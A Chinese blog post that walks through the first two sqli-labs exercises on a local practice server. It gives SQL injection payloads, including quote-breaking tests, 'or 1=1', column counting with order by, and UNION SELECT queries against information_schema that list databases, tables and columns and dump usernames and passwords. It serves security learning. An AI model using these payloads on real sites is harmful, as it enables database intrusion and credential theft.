MYSQL注入(Welcome Dhakkan)

最新推荐文章于 2024-05-11 08:52:01 发布
最新推荐文章于 2024-05-11 08:52:01 发布
阅读量8k 收藏 20
点赞数 4
分类专栏: MySQL 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43613772/article/details/96505665
版权

第一步打开phpStudy,点击启动

打开浏览器输入要登录的题目网址.

less-1
在这里插入图片描述在这里插入图片描述在网址后面输?id=1看一下效果和在数字1后面加一个符号’比较一下
在这里插入图片描述在这里插入图片描述从上述错误当中,我们可以看到提交到 sql 中的 1’在经过 sql 语句构造后形成 ‘1’’ LIMIT 0,1, 多加了一个 ’ 。我们可以尝试一下后面加尝试 ‘or 1=1–+
在这里插入图片描述尝试成功,正常返回数据。

接下来对前面的数据进行排序,利用的是order by 加数字–+
order by 加数字,当数字超过 3 就会报错。
在这里插入图片描述
在这里插入图片描述介绍 union 联合注入,union 的作用是将两个 sql 语句进行联合。Union 可以从 下面的例子中可以看出,强调一点:union 前后的两个 sql 语句的选择列数要相同才可以。U nion all 与 union 的区别是增加了去重的功能。我们这里根据上述 background 的知识,进行 information_schema 知识的应用。

尝试一下: http://127.0.0.1/sqllib/Less-1/?id=-1’union select 1,2–+
在这里插入图片描述

当 id 的数据在数据库中不存在时,(此时我们可以 id=-1,两个 sql 语句进行联合操作时, 当前一个语句选择的内容为空,我们这里就将后面的语句的内容显示出来)此处前台页面返 回了我们构造的 union 的数据。

爆破数据库:

后面加?id=1%27union%20select%201,group_concat(schema_name),3%%20from%20information_schema.schemata–+
在这里插入图片描述
爆security数据库的数据表:
后面加:?id=-1%27union%20select%201,group_concat(table_name),3%20f rom%20information_schema.tables%20where%20table_schema=%27security%27–+

在这里插入图片描述爆user表的列:
后面加:?id=-1%27union%20select%201,group_concat(column_name),3%2 0from%20information_schema.columns%20where%20table_name=%27users%27–+
在这里插入图片描述报数据:
后面加:
?id=-1%27union%20select%201,username,password%20from%20 users%20where%20id=2–+
在这里插入图片描述
less-2

首先打开第二道题:
在这里插入图片描述
后面加?id=1和?id=1’
反应的结果和less-1相同
在这里插入图片描述在这里插入图片描述还是由于单引号引起的抛出异常

仍然使用那两种方法采取保护措施,注释掉剩余的查询。

成功注入的

or 1=1
or 1=1--+

这道题同样可以采用union操作进行注入。

野九
关注
  • 4
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入(上)
weixin_46962006的博客
11-03 3004
                       SQL注入 目录前言工具的准备Less-1源码实操 URL中特殊字符转义编码 前言        内容后续将进行补充        个人观点,若有误请指教 工具的准备 phpstudy(自寻网上安装教程) sqli-labs: ①下载链接:https://github.com/Audi-1/sqli-labs ②解压后,创建本地网站(具体步骤:https://blog.csdn.net/weixin_46962006/article/details/12
MySQL注入攻击与防御
02-25
like,mod(),...)字符串的猜解操作(mid(),left(),rpad(),…)字符串生成操作(0x61,hex(),conv()(使用conv([10-36],10,36)可以实现所有字符的表示))可以用以下语句对一个可能的注入点进行测试以下是Mysql中可以用到的...
SQL注入之sqli-labs(less1-7)
冷冷的oO
04-24 3361
注:靶场基本上每一关的目标都是拿到数据库的用户名和密码。 Less-1 打开第一关看到如下页面,“Dhakkan”是印度俚语,意思是愚蠢的人,页面提示让我们输入ID值作为参数。
How to do sql injections with SQLMAP
安全汪
11-20 639
--------书写只是为了更好的思考                                                                       By:PgHook 0x1 前面的废话 0x2 传统的手工   第一步、判断是否存在注入点   第二步、得到数据库的消息 0x3、sqlmap 传统用法   1、枚举数据库   2、列出数据库中
2024年最全黑客sql注入的原理及解决sql注入问题及优点,2024年最新写给互联网大厂员工的真心话
最新发布
2401_84253037的博客
05-11 384
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
welcome
qq_37005914的博客
01-09 177
这是我的第一个博客 今天是2019/1/9 现在是下午4:37 小雨
sql注入(二)
weixin_42350229的博客
01-13 349
文章链接 https://www.jianshu.com/p/2f8deca3a323 文章目录基础注入less-1Less-2Less-3Less-4 基础注入 less-1 源码分析: <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); err...
sqli-labs(4)
qq_61988806的博客
11-26 107
观察页面发现是一个用来更改用户密码的页面,页面中出现了用户Dhakkanuser输入Dhakkan passs输入1发现成功找注入点先在user尝试,发现不管输入什么都失败在pass中尝试注入在pass中输入1‘报错注入这里的select group_concat(username) from (select username from users)zx。
PHP+MYSQL 注入靶场
04-26
里面有相关源码,参照源码去理解漏洞会更深刻,靶场中有SQL字符型注入,SQL盲注,提供给大家进行练习使用。
mysql注入绕过技术
06-04
mysql注入绕过技术
mysql5 注入漏洞
10-30
mysql5注入漏洞代码
php+mysql注入页面实现
09-11
PHP与MySQL注入页面的实现涉及到Web安全领域中的一个重要话题——SQL注入。SQL注入是一种攻击手段,通过输入恶意的SQL代码,攻击者可以绕过网站的安全防护,获取、修改或删除数据库中的敏感信息。在这个过程中,我们...
基于Sqli-Labs靶场的SQL注入-17~22关
Joker
01-03 1630
这一篇博客我主要讲了HTTP头部注入中的 UA、Referer、Cookie 注入以及 base-64编码。
sqli-labs安装与less1-20解法
qq_43936524的博客
12-08 639
文章目录sqli-labs环境安装Basic Challengesless1联合注入时间注入报错注入布尔注入sqlmapless2less3less4less5less6less7less8less9less10less 11通过闭合直接查询sqlmap -techniqueless12less13less14less15less16less17 sqli-labs环境安装 sqli-labs下载地址:https://github.com/Audi-1/sqli-labs phpstudy下载地址:http
SQLi-Labs 学习笔记(Less 31-40)
Onlyme的博客
03-11 1227
点击打开链接Less-31①先打开网页查看 Welcome Dhakkan与之前唯一的区别在于:[plain] view plain copy$id = '"' .$id. '"';  $sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";  直接构建payload:[plain] view plain copyhttp://localhost/s...
WEB安全环境搭建
weixin_56378389的博客
09-06 330
补发,之前的WEB相关的第一篇文章,当时忘发了
WEB漏洞—SQL注入之简要SQL注入
qq_61861243的博客
04-12 537
SQL直接去对数据库中的数据进行操作(查询,更新,删除)SQL注入不同注入点是有条件的(权限)
SQL注入,Hacker入侵数据是如何做到的
weixin_30596023的博客
03-13 108
什么是SQL注入?   SQL注入就是未将代码与数据进行严格的隔离,导致在读取用户数据的时候,错误地把黑客注入的数据作为代码的一部分执行。   SQL注入自诞生以来以其巨大的杀伤力闻名。      例子:     典型的SQL注入的例子是当对SQL语句进行字符串拼接操作时,直接使用未加转义的用户输入内容作为变量,比如:       var testCondition;       t...
Sqli_lib Less 5
weixin_42357645的博客
09-25 392
Sqli_lib Less 5 Welcome Dhakkan Please input the ID as parameter with numeric value 相比Less 1-4 Less 5更有意思,这是一个简单的盲注。主要依赖几SQL函数: 函数 参数解释 返回值 version() 数据库版本字符串 length(1)/len(1) 1:字符串 数值 substr(1,2N,3N) 1:字符串 2:起始位置(第一位是1) 3:取N个字符 从2N开始的3N个字符
welcomefile
07-27
欢迎页(welcome-file)是在web.xml配置文件中设置的一个页面,用于在用户访问网站时自动跳转到该页面。\[1\]它可以是一个HTML、JSP或其他类型的页面。在配置欢迎页时,不需要以斜杠“/”开始,并且默认从WebRoot目录下开始查找资源。\[2\]设置一个网站的欢迎页的作用是,当用户在访问该网站时,如果没有指定具体的资源路径,就会默认访问该网站的欢迎页。\[3\]要设置欢迎页,可以在web.xml文件中使用<welcome-file-list>标签,并在其中添加<welcome-file>标签来指定欢迎页的文件名或路径。例如:<welcome-file-list> <welcome-file>login.html</welcome-file> </welcome-file-list> #### 引用[.reference_title] - *1* [web.xml中的welcome-file-list标签作用](https://blog.csdn.net/ningmeng666_c/article/details/115538178)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [Web站点的欢迎页面 web.xml -> welcome-file-list](https://blog.csdn.net/cheng_feng_xiao_zhan/article/details/97922481)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值